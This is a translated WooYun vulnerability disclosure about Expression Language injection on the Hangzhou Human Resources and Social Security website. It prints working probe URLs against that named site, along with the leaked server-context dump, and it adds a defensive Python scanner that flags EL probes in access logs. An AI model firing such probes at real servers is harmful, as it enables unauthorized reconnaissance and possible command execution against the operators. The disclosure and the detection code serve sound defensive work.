
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0107171

Title: Hangzhou Human Resources and Social Security website: Expression Language injection (exploitable)

Vendor: Hangzhou Municipal Human Resources and Social Security Bureau

Author: 暗羽

Submitted: 2015-04-13 13:05

Fixed: 2015-05-30 14:00

Published: 2015-05-30 14:00

Vulnerability type: command execution

Severity: medium

Self-assessed Rank: 8

Status: handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-04-13: details sent to the vendor, awaiting vendor handling
2015-04-15: vendor confirmed; details visible to the vendor only
2015-04-25: details disclosed to core white hats and relevant domain experts
2015-05-05: details disclosed to regular white hats
2015-05-15: details disclosed to intern white hats
2015-05-30: details disclosed to the public

Brief description:

Expression language injection

Detailed description:

Site: http://www.zjhz.lss.gov.cn/
Test link: http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d
Result as shown in the screenshot:

[screenshot: QQ截图20150410205845.png]


The test method follows this report:
WooYun-2014-71160: Expression Language injection on a 大众点评 (Dianping) site
I guess this is how it's supposed to be played (⊙v⊙)

Proof of vulnerability:

http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d

[screenshot: QQ截图20150410205845.png, the same image as above]


view-source:http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=${application}

In the page source the year parameter is reflected into the src attribute of a script tag, and ${application} has been evaluated to the ServletContext attribute map (WebLogic, Spring, DWR, OSCache and FreeMarker objects), URL-encoded:

<script src="/web/resource/script/list_utf8.js?year=%7Borg.directwebremoting.Container%3Dorg.directwebremoting.impl.DefaultContainer%406f55455e%2C+org.directwebremoting.ContainerList%3D%5Borg.directwebremoting.impl.DefaultContainer%406f55455e%5D%2C+__oscache_cache%3Dcom.opensymphony.oscache.web.ServletCache%406c70a195%2C+__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%2C+weblogic.servlet.WebAppComponentRuntimeMBean%3Dweblogic.servlet.internal.WebAppRuntimeMBeanImpl%4026c66b4a%2C+org.springframework.web.context.WebApplicationContext.ROOT%3Dorg.springframework.web.context.support.XmlWebApplicationContext%4036e79009%3A+display+name+%5BRoot+WebApplicationContext%5D%3B+startup+date+%5BTue+Feb+10+17%3A32%3A25+CST+2015%5D%3B+root+of+context+hierarchy%2C+__oscache_admins%3D%7B__oscache_cache_admin%3Dcom.opensymphony.oscache.web.ServletCacheAdministrator%40b7571b5%7D%2C+org.directwebremoting.WebContextFactory%24WebContextBuilder%3Dorg.directwebremoting.impl.DefaultWebContextBuilder%404ed39061%2C+javax.servlet.context.tempdir%3D%2Fopt%2FMiddleware%2Fuser_projects%2Fdomains%2Fbase_domain%2Fservers%2Fapp1%2Ftmp%2F_WL_user%2Fweb%2Faakfdm%2Fpublic%2C+javax.servlet.ServletConfig%3Dweblogic.servlet.internal.ServletStubImpl%404422e93c+-+dwr-invoker+class%3A+%27uk.ltd.getahead.dwr.DWRServlet%27%2C+freemarker.Configuration%3Dfreemarker.template.Configuration%404b7c27f3%2C+weblogic.servlet.WebAppComponentMBean%3Dweblogic.management.configuration.WebAppComponentMBeanImpl%401a3b23f1%28%5Bbase_domain%5D%2FApplications%5Bweb%5D%2FWebAppComponents%5Bweb%5D%29%2C+org.directwebremoting.impl.ServerContext%3Dorg.directwebremoting.impl.DefaultServerContext%40568074d1%2C+contextConfigLocation%3D%2FWEB-INF%2Fclasses%2FapplicationContext.xml%2C+com.sun.faces.config.WebConfiguration%3Dcom.sun.faces.config.WebConfiguration%4023abf8b5%2C+javax.servlet.http.HttpServlet%3Duk.ltd.getahead.dwr.DWRServlet%404ffe8516%7D"></script>
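The report shows the two classic EL-injection probes: an arithmetic expression (${10000-99}) that proves evaluation, and ${application}, which dumps the ServletContext attributes. From the defender's side, the same signal can be pulled out of web-server access logs. The following scanner is an added example (it is not part of the original report and not the site's code): it assumes combined-format access-log lines, which are constructed here, percent-decodes each query parameter repeatedly so that double-encoded probes are not missed, and reports every parameter whose decoded value contains EL syntax (${...} or #{...}).

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# EL expression syntax as used by JSP/JSF pages: ${...} or #{...}
EL_EXPR = re.compile(r"[$#]\{[^{}]*\}")

# Combined-format access-log line; only the fields the scanner needs are captured.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log lines (assumption: not taken from the report or the site).
# The first two carry the probes the report used, the third is the same arithmetic
# probe double-encoded, and the fourth is a benign request for comparison.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Apr/2015:20:58:45 +0800] "GET /html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d HTTP/1.1" 200 5120
203.0.113.5 - - [10/Apr/2015:20:59:02 +0800] "GET /html/wsbs/cyxxcx/queryCompCredited.html?year=${application} HTTP/1.1" 200 9873
203.0.113.5 - - [10/Apr/2015:21:00:10 +0800] "GET /html/wsbs/cyxxcx/queryCompCredited.html?year=%2524%257B10000-99%257D HTTP/1.1" 200 5120
198.51.100.7 - - [10/Apr/2015:21:01:00 +0800] "GET /html/wsbs/cyxxcx/queryCompCredited.html?year=2014 HTTP/1.1" 200 5120
"""


def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing, so double-encoded probes are seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def el_probes_in_query(query):
    """Yield (param, decoded_value, [expressions]) for each query parameter carrying EL syntax."""
    for name, raw in parse_qsl(query, keep_blank_values=True):
        value = fully_decode(raw)          # parse_qsl already decoded once
        exprs = EL_EXPR.findall(value)
        if exprs:
            yield name, value, exprs


def scan_log(text):
    """Return one finding per (request, parameter) pair whose value contains an EL expression."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue                        # skip lines that are not in the expected format
        parts = urlsplit(m.group("target"))
        for name, value, exprs in el_probes_in_query(parts.query):
            findings.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": parts.path,
                "param": name,
                "value": value,
                "expressions": exprs,
                "status": int(m.group("status")),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} {f['path']} {f['param']}={f['value']!r} -> {f['expressions']}")
```

Run as-is, the scanner flags three of the four constructed requests and leaves year=2014 alone. A hit on its own only says that someone sent EL syntax; whether the server evaluated it has to be judged from the response, as the report does with the 10000-99 arithmetic. The actual fix is on the application side: a request parameter must never reach a sink that evaluates it as EL a second time, and the report does not say which tag or template on this site does so.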


Fix recommendation:

Copyright notice: please credit the source when reposting: 暗羽@乌云


Vulnerability response

Vendor response:

Severity: medium

Vulnerability Rank: 7

Confirmed: 2015-04-15 14:00

Vendor reply:

CNVD has confirmed and reproduced the reported vulnerability; it has been forwarded via CNCERT to the Zhejiang branch, which will coordinate handling with the website's operating unit.

Latest status:

None yet